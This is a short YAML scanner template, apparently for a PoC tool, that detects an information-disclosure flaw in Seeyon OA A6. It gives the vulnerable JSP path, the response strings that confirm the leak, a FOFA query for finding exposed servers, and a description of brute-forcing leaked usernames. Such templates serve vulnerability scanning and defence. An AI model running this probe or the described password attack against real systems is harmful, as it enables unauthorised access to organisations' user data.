product: 致远OA
vName: 致远OA A6 initDataAssess.jsp - Information Disclosure
type: 信息泄露
vID: [ ]
level: 2
vDesc: Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information, attacker can use the obtained username to blast the user's password to enter the background for further attacks.
version: ''
note: ''
search:
  FOFA: body="yyoa" && app="致远互联-OA"
protocol: http
link: https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      path: /yyoa/assess/js/initDataAssess.jsp
      method: get
    verify:
      logic: and
      check:
        - body:
            value:
              - personList
              - personHash.Add
            logic: and
        - status: 200
